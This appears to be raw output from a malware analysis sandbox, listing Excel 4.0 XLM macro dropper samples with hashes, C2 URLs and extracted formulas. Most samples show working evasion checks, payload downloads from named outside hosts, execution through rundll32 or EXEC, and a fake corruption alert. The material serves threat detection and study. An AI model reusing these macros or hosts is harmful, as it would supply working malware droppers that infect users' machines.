:{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yIWqUzA2fZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"459a7704049a39948a98d8c33ec94c41d88f9ee73fab8568ee176d9c3f0827b8"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"459a7704049a39948a98d8c33ec94c41d88f9ee73fab8568ee176d9c3f0827b8","filesize":209920,"md5":"86e58090c5b98dfb928886932bc1187f","sha1":"8ccc00943fc3bb1b0c90533e1cd84f3010e2098b","sha256":"459a7704049a39948a98d8c33ec94c41d88f9ee73fab8568ee176d9c3f0827b8","sha512":"d34717c1848b3513fe1c3b2de88e75bebb55849cf98bdf646a2d9e4c1c00cef622b8782725e08d5e7d055553528a74902925636a7a7fb7a1492c05353da31059","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"459a7704049a39948a98d8c33ec94c41d88f9ee73fab8568ee176d9c3f0827b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fO3qn1eYnl\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45d294892b1eb8ba7c6da9e432bd1eed7f10e637528545f03cdaec956e5dad0a"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45d294892b1eb8ba7c6da9e432bd1eed7f10e637528545f03cdaec956e5dad0a","filesize":116224,"md5":"b548fb8bf2429815aa0ba17d9deb794c","sha1":"63a2572de386eda4eef87c7875fe1c0566716d92","sha256":"45d294892b1eb8ba7c6da9e432bd1eed7f10e637528545f03cdaec956e5dad0a","sha512":"66d6b817eeff27929382e70f4a9f7087de7f5ea4419ecb87182013b5696810c53c6d1df2431ebb6adab06fd66406b33df089ce2ff64ed1670e8a2efd08b481eb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45d294892b1eb8ba7c6da9e432bd1eed7f10e637528545f03cdaec956e5dad0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QdqNe0mvCB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45d677994b487df6fafbbf53c7da82f701765f802034145cb2a680d63fe9d696"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45d677994b487df6fafbbf53c7da82f701765f802034145cb2a680d63fe9d696","filesize":221184,"md5":"cac66c216f30c4cdc9c52a2295b26682","sha1":"e0d8e4c5f952b57326579165b7e5abaa318eadbc","sha256":"45d677994b487df6fafbbf53c7da82f701765f802034145cb2a680d63fe9d696","sha512":"26434ec660aa80f48a70224b925df8fb2aa271f3e6590cf789339d45db7affe2c15b735ab92b200b93aba01b1833c69386df119ecba5826ec099e359fd19793d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45d677994b487df6fafbbf53c7da82f701765f802034145cb2a680d63fe9d696.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6wPC14j6KK\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45eabe81e9b0289f74353fc27f31351b6b3002c6677f45be804a9dabc05e7ec5"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45eabe81e9b0289f74353fc27f31351b6b3002c6677f45be804a9dabc05e7ec5","filesize":113664,"md5":"4e21e1934f2f111f92c4439f4753c844","sha1":"b99e70dea081bd41a499f4d932cc0bb38fb8dc00","sha256":"45eabe81e9b0289f74353fc27f31351b6b3002c6677f45be804a9dabc05e7ec5","sha512":"4ccef4eb43b71616967f24d8e10885ddab250b9b1016d6ac0e245c46bc9e006c012869ece551af92e6018d830c055fbc8279fecda4203d65aae83e916afc438f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45eabe81e9b0289f74353fc27f31351b6b3002c6677f45be804a9dabc05e7ec5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"rEQTxMaikI\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45f091081f0737f427cea44c1d50df0a4ba477dbd8a83b56812dc78824503680"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45f091081f0737f427cea44c1d50df0a4ba477dbd8a83b56812dc78824503680","filesize":226304,"md5":"914a0c3098ff698e7d5fd76a7efd0a74","sha1":"ade172e427a32f0be8a4565dbb3db76dce81f6ff","sha256":"45f091081f0737f427cea44c1d50df0a4ba477dbd8a83b56812dc78824503680","sha512":"cc0e865732e007252f13fa0c533d887447b750851c31b001e3f58d41390f144c7b30ce3c050badd9651d9230ff2a55f6d919528d7e6a493b1a2ee1e8f4aeaa21","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45f091081f0737f427cea44c1d50df0a4ba477dbd8a83b56812dc78824503680.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NqUlk5VpEL\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45f20b14315367a24c6bfc4c2bf471e5a18a76dfd56df24c91b18baf16348cf4"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45f20b14315367a24c6bfc4c2bf471e5a18a76dfd56df24c91b18baf16348cf4","filesize":171008,"md5":"d20c21a5ba9cc3e85f016b34727ca8c0","sha1":"456623b0ae3a32daa99bb5106503fc5a38957fe7","sha256":"45f20b14315367a24c6bfc4c2bf471e5a18a76dfd56df24c91b18baf16348cf4","sha512":"97a1ee2f0600d01caef3a32ab4c035c105587f9f8b9df54ca5c718e7ca938dd7e8ec1eb6c2f8c8af628a1e4fda12fea37551e4374e497391e420f7c723067457","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45f20b14315367a24c6bfc4c2bf471e5a18a76dfd56df24c91b18baf16348cf4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l6FEpF4ht6\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45f443888100ade5e01bb27423699f4a156a7ceb4f9ca8bd9fac2924c78f9339"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45f443888100ade5e01bb27423699f4a156a7ceb4f9ca8bd9fac2924c78f9339","filesize":116224,"md5":"9d82e3a1efe01a8fdf046bb3a6906f8d","sha1":"9f73820cdcaddc821fdd400b7c3201d65b6ae90f","sha256":"45f443888100ade5e01bb27423699f4a156a7ceb4f9ca8bd9fac2924c78f9339","sha512":"c3c3147ff8f6bae38ad7e663a6701e8625c86b2ba12add10805878969719afb95a452cba5423eaaca755b32ccab231c90cc4cac7ab943612170e829bd6e5cd1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45f443888100ade5e01bb27423699f4a156a7ceb4f9ca8bd9fac2924c78f9339.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pNGbfDwPVG\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45fbc5a063332685e5cb1f667de2dc289db8e8b65b83f8b374547e7161d81b23"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45fbc5a063332685e5cb1f667de2dc289db8e8b65b83f8b374547e7161d81b23","filesize":170496,"md5":"214027026dd73303030f49335e48be1b","sha1":"07834eda71448f40415b71173c2948c0ec840b7a","sha256":"45fbc5a063332685e5cb1f667de2dc289db8e8b65b83f8b374547e7161d81b23","sha512":"40ba0de49e4fe435692063bd24c35aeeb7b9daa55eaa3b3b1c8c8a34fbca1aacda3082eddc5065a92f47888e4ecd493085c4d98627693e03e193733503968dc4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45fbc5a063332685e5cb1f667de2dc289db8e8b65b83f8b374547e7161d81b23.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hOMk0h1bxn\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4600de7629f910f3626ea32b7b61d9e79d2f079635852f33bb9e011ed08eb727"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"4600de7629f910f3626ea32b7b61d9e79d2f079635852f33bb9e011ed08eb727","filesize":144896,"md5":"4c9b2702575d17f6d152aa54b6566d18","sha1":"79579b734caeb1e70b2418b441a13344bffdcc58","sha256":"4600de7629f910f3626ea32b7b61d9e79d2f079635852f33bb9e011ed08eb727","sha512":"a422fa5e0dbfa037788462ee339abe266f97b162da70667d6bcf3780a4da138cf1d6c1afd54e3569a369a85939ad09b7d488d53d8a10902f3c9be0a77a019b67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4600de7629f910f3626ea32b7b61d9e79d2f079635852f33bb9e011ed08eb727.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4602e5129eafe8fe62531b399717975fc9449dd3d17e8fd1204820431f8c5a3b"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"4602e5129eafe8fe62531b399717975fc9449dd3d17e8fd1204820431f8c5a3b","filesize":160768,"md5":"420f6b8f3e742d44de6ef88b6acb4dff","sha1":"99addeff27443f95d2f3c5f793503003e196b9ae","sha256":"4602e5129eafe8fe62531b399717975fc9449dd3d17e8fd1204820431f8c5a3b","sha512":"03294e995d8178aa12d8c63dba4dc26c5eaddd97634ab89fa15894b2e9a557c157e8473ca97cb2328bee95d57e246effc6ca559d79c564a5353930f09afac535","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4602e5129eafe8fe62531b399717975fc9449dd3d17e8fd1204820431f8c5a3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OmB44n8xYy\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46256f871ffcc2eecad7c4477565c9c4fdea71853d40060af7b326bdbb431f59"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46256f871ffcc2eecad7c4477565c9c4fdea71853d40060af7b326bdbb431f59","filesize":168448,"md5":"b4556ff41e9baaef71968ea667216595","sha1":"19f96438c64229103978ce65d89a1594bcbf5da4","sha256":"46256f871ffcc2eecad7c4477565c9c4fdea71853d40060af7b326bdbb431f59","sha512":"a93a3f8c78b18500ffa2daf546befb839625246fb45df75be85ca89f416f4c7016cf8d14c77b27969abc31af2a8f53efaee6e6120b4642c2671e272d97e98065","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46256f871ffcc2eecad7c4477565c9c4fdea71853d40060af7b326bdbb431f59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"svqOOmMbZK\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46282763775fd2e2075fdea5fea9bf918ba816a9b9b3ac6d568eaf64c10bc7d2"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46282763775fd2e2075fdea5fea9bf918ba816a9b9b3ac6d568eaf64c10bc7d2","filesize":116224,"md5":"a03ae50077bf6fad3b562241444481c1","sha1":"394972b5efd4ae395ae402875a946f7e0822bbe4","sha256":"46282763775fd2e2075fdea5fea9bf918ba816a9b9b3ac6d568eaf64c10bc7d2","sha512":"b0855841ebd7fe347eed1a7d63965df0267fca19014d7bb18a6ae2923286d0e9978e3a73a5f8fa52b8cd74e8e7f23338d799fe7999164f1e8f02b84b2932392d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46282763775fd2e2075fdea5fea9bf918ba816a9b9b3ac6d568eaf64c10bc7d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gW6COHGW9K\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"462e52ddc2e6343dde1a1c665dec0fde88d2d761cc9c117aa94e9752a580cadb"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"462e52ddc2e6343dde1a1c665dec0fde88d2d761cc9c117aa94e9752a580cadb","filesize":185344,"md5":"a349ccc6845bee2f690611f42b071a42","sha1":"a4cddc256b2c45b5d97650ba7e686b71926efeb9","sha256":"462e52ddc2e6343dde1a1c665dec0fde88d2d761cc9c117aa94e9752a580cadb","sha512":"0090bd97bf09593107272a58420c4322240d8ac8f2b687b6ab3790362a4b6924afb1fd646be9c1a2f194cc2ddeb49b7e1ffae1b3bb5c05381c74a30150459f8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"462e52ddc2e6343dde1a1c665dec0fde88d2d761cc9c117aa94e9752a580cadb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
